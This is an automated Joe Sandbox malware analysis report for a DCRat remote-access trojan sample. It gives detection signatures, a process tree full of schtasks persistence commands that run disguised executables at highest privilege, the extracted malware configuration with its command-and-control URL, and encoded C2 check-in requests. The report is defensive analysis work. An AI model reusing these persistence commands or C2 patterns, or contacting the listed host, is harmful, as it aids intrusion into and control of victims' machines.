Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DCRatBuild.exe

Overview

General Information

Sample name:DCRatBuild.exe
Analysis ID:1561293
MD5:a92e55e04cc2026f53c97bdf0e91f6ba
SHA1:a31af958d3f885e0f55465acc214bdb0d56e672f
SHA256:f395305daac1c6e8fd577b85bc9132b5358c9e4c4b818b61f76d50d2477a3906
Tags:exeuser-aachum
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • DCRatBuild.exe (PID: 3472 cmdline: "C:\Users\user\Desktop\DCRatBuild.exe" MD5: A92E55E04CC2026F53C97BDF0E91F6BA)
    • wscript.exe (PID: 4776 cmdline: "C:\Windows\System32\WScript.exe" "C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2792 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ChainBlocksurrogateagentFont\qVwtNBtq7doCC7qZCII8cJUJd.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • portperf.exe (PID: 3968 cmdline: "C:\ChainBlocksurrogateagentFont\portperf.exe" MD5: A054982F7E12C1F491ECCD25D9C1B5D7)
          • schtasks.exe (PID: 3500 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2444 cmdline: schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1136 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5140 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6096 cmdline: schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6600 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4952 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6316 cmdline: schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7184 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7200 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7216 cmdline: schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7232 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7256 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7272 cmdline: schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7316 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7344 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7360 cmdline: schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7376 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 6 /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7392 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7408 cmdline: schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7424 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7456 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7480 cmdline: schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7500 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7532 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7548 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7564 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 7704 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\LHgpusyvSo.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • w32tm.exe (PID: 7800 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • dfVXJbANbh.exe (PID: 7248 cmdline: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe" MD5: A054982F7E12C1F491ECCD25D9C1B5D7)
  • dfVXJbANbh.exe (PID: 7288 cmdline: "C:\Users\Default User\Videos\dfVXJbANbh.exe" MD5: A054982F7E12C1F491ECCD25D9C1B5D7)
  • System.exe (PID: 7308 cmdline: "C:\Program Files\7-Zip\Lang\System.exe" MD5: A054982F7E12C1F491ECCD25D9C1B5D7)
  • System.exe (PID: 7336 cmdline: "C:\Program Files\7-Zip\Lang\System.exe" MD5: A054982F7E12C1F491ECCD25D9C1B5D7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"c\":\"`\",\"V\":\"!\",\"u\":\";\",\"v\":\"(\",\"9\":\"-\",\"Q\":\" \",\"R\":\">\",\"w\":\"#\",\"d\":\"|\",\"P\":\"*\",\"Z\":\"_\",\"i\":\"~\",\"E\":\".\",\"n\":\"%\",\"S\":\"<\",\"D\":\"$\",\"I\":\",\",\"1\":\"&\",\"4\":\")\",\"A\":\"@\",\"J\":\"^\"}", "PCRT": "{\"w\":\"&\",\"y\":\",\",\"=\":\"#\",\"i\":\"(\",\"b\":\".\",\"M\":\"$\",\"6\":\">\",\"I\":\"`\",\"c\":\"*\",\"j\":\")\",\"e\":\"~\",\"x\":\"|\",\"S\":\"!\",\"Q\":\"%\",\"p\":\"-\",\"X\":\"_\",\"D\":\"@\",\"0\":\"<\",\"f\":\";\",\"l\":\"^\"}", "TAG": "", "MUTEX": "DCR_MUTEX-ecQxDbp6oRSPS3tKADSR", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://cy98085.tw1.ru/@=UmM2UTY4ADZ", "H2": "http://cy98085.tw1.ru/@=UmM2UTY4ADZ", "T": "0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001A.00000002.2307312574.0000000002DB8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000014.00000002.3401292480.00000000025CE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
      00000018.00000002.2314012773.0000000002C76000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000017.00000002.2314115683.0000000002DC7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
            Click to see the 17 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Execution from Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default User\Videos\dfVXJbANbh.exe", CommandLine: "C:\Users\Default User\Videos\dfVXJbANbh.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\Videos\dfVXJbANbh.exe, NewProcessName: C:\Users\Default\Videos\dfVXJbANbh.exe, OriginalFileName: C:\Users\Default\Videos\dfVXJbANbh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: "C:\Users\Default User\Videos\dfVXJbANbh.exe", ProcessId: 7288, ProcessName: dfVXJbANbh.exe
            Sigma detected: Files With System Process Name In Unsuspected Locations
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ChainBlocksurrogateagentFont\portperf.exe, ProcessId: 3968, TargetFilename: C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /f, CommandLine: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ChainBlocksurrogateagentFont\portperf.exe", ParentImage: C:\ChainBlocksurrogateagentFont\portperf.exe, ParentProcessId: 3968, ParentProcessName: portperf.exe, ProcessCommandLine: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /f, ProcessId: 5140, ProcessName: schtasks.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DCRatBuild.exe", ParentImage: C:\Users\user\Desktop\DCRatBuild.exe, ParentProcessId: 3472, ParentProcessName: DCRatBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe" , ProcessId: 4776, ProcessName: wscript.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Schedule system process
            Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ChainBlocksurrogateagentFont\portperf.exe", ParentImage: C:\ChainBlocksurrogateagentFont\portperf.exe, ParentProcessId: 3968, ParentProcessName: portperf.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /f, ProcessId: 7532, ProcessName: schtasks.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T02:20:10.246184+010020341941A Network Trojan was detected192.168.2.649723185.114.245.12380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T02:20:23.852194+010028508621Malware Command and Control Activity Detected185.114.245.12380192.168.2.649757TCP
            2024-11-23T02:21:55.896496+010028508621Malware Command and Control Activity Detected185.114.245.12380192.168.2.649987TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: DCRatBuild.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbeAvira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\LHgpusyvSo.batAvira: detection malicious, Label: BAT/Delbat.C
            Source: C:\Program Files\7-Zip\Lang\System.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Found malware configuration
            Source: 00000014.00000002.3401292480.0000000002511000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"c\":\"`\",\"V\":\"!\",\"u\":\";\",\"v\":\"(\",\"9\":\"-\",\"Q\":\" \",\"R\":\">\",\"w\":\"#\",\"d\":\"|\",\"P\":\"*\",\"Z\":\"_\",\"i\":\"~\",\"E\":\".\",\"n\":\"%\",\"S\":\"<\",\"D\":\"$\",\"I\":\",\",\"1\":\"&\",\"4\":\")\",\"A\":\"@\",\"J\":\"^\"}", "PCRT": "{\"w\":\"&\",\"y\":\",\",\"=\":\"#\",\"i\":\"(\",\"b\":\".\",\"M\":\"$\",\"6\":\">\",\"I\":\"`\",\"c\":\"*\",\"j\":\")\",\"e\":\"~\",\"x\":\"|\",\"S\":\"!\",\"Q\":\"%\",\"p\":\"-\",\"X\":\"_\",\"D\":\"@\",\"0\":\"<\",\"f\":\";\",\"l\":\"^\"}", "TAG": "", "MUTEX": "DCR_MUTEX-ecQxDbp6oRSPS3tKADSR", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://cy98085.tw1.ru/@=UmM2UTY4ADZ", "H2": "http://cy98085.tw1.ru/@=UmM2UTY4ADZ", "T": "0"}
            Multi AV Scanner detection for dropped file
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exeReversingLabs: Detection: 73%
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeReversingLabs: Detection: 73%
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeReversingLabs: Detection: 73%
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\dfVXJbANbh.exeReversingLabs: Detection: 73%
            Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exeReversingLabs: Detection: 73%
            Source: C:\Program Files (x86)\Windows Multimedia Platform\dfVXJbANbh.exeReversingLabs: Detection: 73%
            Source: C:\Program Files\7-Zip\Lang\System.exeReversingLabs: Detection: 73%
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeReversingLabs: Detection: 73%
            Source: C:\Users\Public\Music\dfVXJbANbh.exeReversingLabs: Detection: 73%
            Source: C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exeReversingLabs: Detection: 73%
            Multi AV Scanner detection for submitted file
            Source: DCRatBuild.exeReversingLabs: Detection: 63%
            Source: DCRatBuild.exeVirustotal: Detection: 54%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Machine Learning detection for dropped file
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exeJoe Sandbox ML: detected
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exeJoe Sandbox ML: detected
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exeJoe Sandbox ML: detected
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exeJoe Sandbox ML: detected
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exeJoe Sandbox ML: detected
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exeJoe Sandbox ML: detected
            Source: C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exeJoe Sandbox ML: detected
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exeJoe Sandbox ML: detected
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeJoe Sandbox ML: detected
            Source: C:\Program Files\7-Zip\Lang\System.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: DCRatBuild.exeJoe Sandbox ML: detected
            Source: DCRatBuild.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeDirectory created: C:\Program Files\7-Zip\Lang\System.exeJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeDirectory created: C:\Program Files\7-Zip\Lang\27d1bcfc3c54e0Jump to behavior
            Source: DCRatBuild.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DCRatBuild.exe
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D6A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00D6A5F4
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D7B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00D7B8E0
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D8AAA8 FindFirstFileExA,0_2_00D8AAA8
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile opened: C:\Users\userJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49723 -> 185.114.245.123:80
            Source: Network trafficSuricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 185.114.245.123:80 -> 192.168.2.6:49757
            Source: Network trafficSuricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 185.114.245.123:80 -> 192.168.2.6:49987
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: http://cy98085.tw1.ru/@=UmM2UTY4ADZ
            Source: Joe Sandbox ViewASN Name: TIMEWEB-ASRU TIMEWEB-ASRU
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhM&b7b99a30519e3c2e292a564e824776d3=5b034698153668d1ec1ed7aaf90dfff6&e14aa04c57d43a589b010571fdc09bbd=wNmhzMkV2NkNWOjZDM2YTMjZWYjRGZyETM0YDOwQjMmlzMwATYyIGM&BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhM HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&1897097195362e5524f24dd6cd4188d9=0VfiIiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIlFGOzYWZhdjM4kzMmVmNlJGN5MzMhZ2MxEjZ5EGN5U2YjRmY0M2NxIiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ruConnection: Keep-Alive
